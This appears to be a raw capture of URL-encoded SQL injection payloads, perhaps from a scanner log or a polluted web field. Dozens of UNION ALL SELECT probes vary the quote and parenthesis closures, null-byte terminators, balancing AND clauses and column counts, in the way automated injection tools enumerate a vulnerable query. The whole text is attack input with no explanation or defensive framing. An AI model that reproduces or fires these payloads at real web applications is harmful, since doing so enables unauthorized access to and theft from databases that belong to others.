-9014%29%20UNION%20ALL%20SELECT%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%2C%208344%00 -8382%29%20UNION%20ALL%20SELECT%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%2C%202585%00 -5649%29%20UNION%20ALL%20SELECT%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%2C%207132%00 -9311%29%20UNION%20ALL%20SELECT%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%00 -7734%27%29%20UNION%20ALL%20SELECT%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%2C%208182%00 -8938%27%29%20UNION%20ALL%20SELECT%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%2C%208309%00 -3984%27%29%20UNION%20ALL%20SELECT%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%00 -3527%27%29%20UNION%20ALL%20SELECT%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%00 -2867%27%29%20UNION%20ALL%20SELECT%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%00 -8665%27%29%20UNION%20ALL%20SELECT%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%2C%201038%00 -2373%27%29%20UNION%20ALL%20SELECT%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%2C%208491%00 -4451%27%29%20UNION%20ALL%20SELECT%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%00 -5672%27%29%20UNION%20ALL%20SELECT%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%2C%205727%00 -1876%27%29%20UNION%20ALL%20SELECT%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%2C%208181%00 -7654%27%20UNION%20ALL%20SELECT%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%2C%208552%00 -7351%27%20UNION%20ALL%20SELECT%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%2C%203549%00 -6302%27%20UNION%20ALL%20SELECT%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%2C%205459%00 -7451%27%20UNION%20ALL%20SELECT%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%00 -8971%27%20UNION%20ALL%20SELECT%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%00 -5706%27%20UNION%20ALL%20SELECT%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%00 -5579%27%20UNION%20ALL%20SELECT%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%2C%206669%00 -2486%27%20UNION%20ALL%20SELECT%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%2C%206624%00 -2441%27%20UNION%20ALL%20SELECT%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%2C%208307%00 -7427%27%20UNION%20ALL%20SELECT%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%2C%207163%00 -2917%22%20UNION%20ALL%20SELECT%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%00 -7867%22%20UNION%20ALL%20SELECT%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%2C%208624%00 -4210%22%20UNION%20ALL%20SELECT%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%2C%209238%00 -6831%22%20UNION%20ALL%20SELECT%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%2C%209085%00 -6604%22%20UNION%20ALL%20SELECT%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%2C%207186%00 -2396%22%20UNION%20ALL%20SELECT%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%2C%204271%00 -6510%22%20UNION%20ALL%20SELECT%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%00 -2016%22%20UNION%20ALL%20SELECT%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%2C%206086%00 -6749%22%20UNION%20ALL%20SELECT%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%2C%204412%00 -1499%22%20UNION%20ALL%20SELECT%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%2C%204348%00 -3170%29%20UNION%20ALL%20SELECT%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%2C%209639%00%20AND%20%283324%3D3324 -4859%29%20UNION%20ALL%20SELECT%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%2C%205540%00%20AND%20%287913%3D7913 -5287%29%20UNION%20ALL%20SELECT%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%2C%201901%00%20AND%20%285601%3D5601 -8932%29%20UNION%20ALL%20SELECT%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%2C%202942%00%20AND%20%286743%3D6743 -4394%29%20UNION%20ALL%20SELECT%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%00%20AND%20%286393%3D6393 -2152%29%20UNION%20ALL%20SELECT%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%2C%206774%00%20AND%20%285106%3D5106 -5050%29%20UNION%20ALL%20SELECT%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%2C%207595%00%20AND%20%285217%3D5217 -9624%29%20UNION%20ALL%20SELECT%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%00%20AND%20%289955%3D9955 -4101%29%20UNION%20ALL%20SELECT%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%00%20AND%20%288409%3D8409 -9147%29%20UNION%20ALL%20SELECT%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%2C%202141%00%20AND%20%288227%3D8227 -7685%29%29%20UNION%20ALL%20SELECT%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%2C%201686%00%20AND%20%28%284077%3D4077 -1519%29%29%20UNION%20ALL%20SELECT%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%00%20AND%20%28%285014%3D5014 -7987%29%29%20UNION%20ALL%20SELECT%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%2C%208598%00%20AND%20%28%285972%3D5972 -8144%29%29%20UNION%20ALL%20SELECT%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%00%20AND%20%28%283927%3D3927 -6786%29%29%20UNION%20ALL%20SELECT%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%2C%201731%00%20AND%20%28%284836%3D4836 -1897%29%29%20UNION%20ALL%20SELECT%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%2C%201386%00%20AND%20%28%285281%3D5281 -3005%29%29%20UNION%20ALL%20SELECT%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%2C%205663%00%20AND%20%28%288113%3D8113 -8476%29%29%20UNION%20ALL%20SELECT%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%2C%203746%00%20AND%20%28%282686%3D2686 -3164%29%29%20UNION%20ALL%20SELECT%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%2C%207041%00%20AND%20%28%283306%3D3306 -3024%29%29%20UNION%20ALL%20SELECT%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%00%20AND%20%28%286895%3D6895 -8447%29%29%29%20UNION%20ALL%20SELECT%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%00%20AND%20%28%28%284787%3D4787 -5197%29%29%29%20UNION%20ALL%20SELECT%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%2C%209132%00%20AND%20%28%28%281452%3D1452 -8102%29%29%29%20UNION%20ALL%20SELECT%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%2C%203083%00%20AND%20%28%28%286747%3D6747 -3316%29%29%29%20UNION%20ALL%20SELECT%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%2C%202150%00%20AND%20%28%28%287816%3D7816 -9267%29%29%29%20UNION%20ALL%20SELECT%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%2C%201246%00%20AND%20%28%28%284726%3D4726 -9751%29%29%29%20UNION%20ALL%20SELECT%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%2C%202645%00%20AND%20%28%28%286228%3D6228 -2873%29%29%29%20UNION%20ALL%20SELECT%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%2C%201996%00%20AND%20%28%28%287791%3D7791 